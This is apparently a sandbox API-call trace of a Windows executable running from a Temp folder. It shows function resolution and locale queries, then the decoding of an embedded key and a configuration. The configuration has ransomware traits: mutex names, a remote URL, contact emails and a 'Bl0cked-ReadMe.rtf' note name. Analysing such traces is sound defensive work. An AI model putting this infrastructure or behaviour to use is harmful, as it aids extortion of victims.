GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0108.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0108.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13e82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", 
lpUsedDefaultChar=0x0) returned 18 [0108.812] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0108.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0108.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13d288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0108.812] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0108.813] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13e82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0108.813] GetProcAddress (hModule=0x76750000, 
lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13e82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0108.813] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0108.813] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0108.813] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ef48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0108.813] 
GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0108.813] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0108.814] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0108.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0108.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0108.814] GetProcAddress 
(hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0108.814] GetThreadLocale () returned 0x409 [0108.814] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0108.814] GetCurrentThreadId () returned 0xcc4 [0108.814] GetCurrentThreadId () returned 0xcc4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0108.814] GetThreadLocale () returned 0x409 [0108.814] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0108.814] GetThreadLocale () returned 0x409 [0108.814] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0108.814] GetCurrentThreadId () returned 0xcc4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: 
lpLCData="Thursday") returned 9 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: 
lpLCData="June") returned 5 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") 
returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.816] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0108.816] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0108.818] 
GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0108.833] GetProcAddress 
(hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0108.834] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0108.834] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0108.834] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0108.834] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0108.834] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0108.838] GetACP () returned 0x4e4 [0108.839] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0108.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.839] GetTickCount () returned 0x260c4 [0108.839] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=16562790980) returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x52\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x42\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x62\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x47\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 
lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x66\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x67\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0108.839] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d 
(Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0108.839] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0108.839] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0108.840] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0108.840] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0108.840] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0108.840] LockResource (hResData=0x50d55c) returned 0x50d55c [0108.840] FreeResource (hResData=0x50d55c) returned 0 [0108.840] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.840] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.840] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.840] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.840] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0108.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1404f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1404f60, cbMultiByte=38, lpWideCharStr=0x13fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.840] FreeResource (hResData=0x50d64c) returned 0 [0108.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1404f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.840] GetCurrentThreadId () returned 0xcc4 [0108.840] GetCurrentThreadId () returned 0xcc4 [0108.840] GetCurrentThreadId () returned 0xcc4 [0108.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13bcd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0108.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13bcd18, cbMultiByte=239, lpWideCharStr=0x13c2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0108.841] GetCurrentThreadId () returned 0xcc4 [0108.841] GetCurrentThreadId () returned 0xcc4 [0108.841] 